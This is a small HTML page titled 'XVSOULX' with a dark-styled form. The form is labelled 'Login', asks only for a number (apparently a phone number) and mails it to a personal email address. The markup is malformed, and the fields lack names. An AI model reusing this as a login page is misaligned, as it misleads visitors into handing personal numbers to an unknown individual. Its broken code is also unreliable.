<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>XVSOULX</title>
    <style>
        /* Set background color for the page */
        body {
            background-color: #121212; /* Dark background */
            color: #fff; /* White text */
            font-family: Arial, sans-serif;
            text-align: center;
        }

        /* Style the form container */
        form {
            background-color: #333; /* Dark gray background for the form */
            padding: 20px;
            border-radius: 10px;
            width: 300px;
            margin: 50px auto;
            box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.5);
        }

        /* Style the labels */
        label {
            font-size: 16px;
            color: #f1c40f; /* Yellow color for the label */
        }

        /* Style the input fields */
        input[type="number"] {
            padding: 10px;
            width: 100%;
            margin-top: 10px;
            border: 1px solid #444; /* Slightly lighter gray border */
            border-radius: 5px;
            background-color: #222; /* Dark background for the input */
            color: #fff; /* White text */
        }

        /* Style the button */
        button {
            background-color: #3498db; /* Blue background */
            color: #fff; /* White text */
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 20px;
            width: 100%;
        }

        /* Hover effect for the button */
        button:hover {
            background-color: #2980b9; /* Darker blue on hover */
        }

    </style>
</head>
<body>
    <h1>XVSOULX</h1>
    <form action="mailto:acelegendary65@email.com" method="post">
        <label for="number">NUMBER: </label>
        <label for="number">NUMBER</label>
        <input type="number" min="11" placeholder="enter your number">
        <br<br>
        <input type="number" min="11" placeholder="Enter your number" required>
        <button type="submit">Login</button>
    </form>
</body>
</html>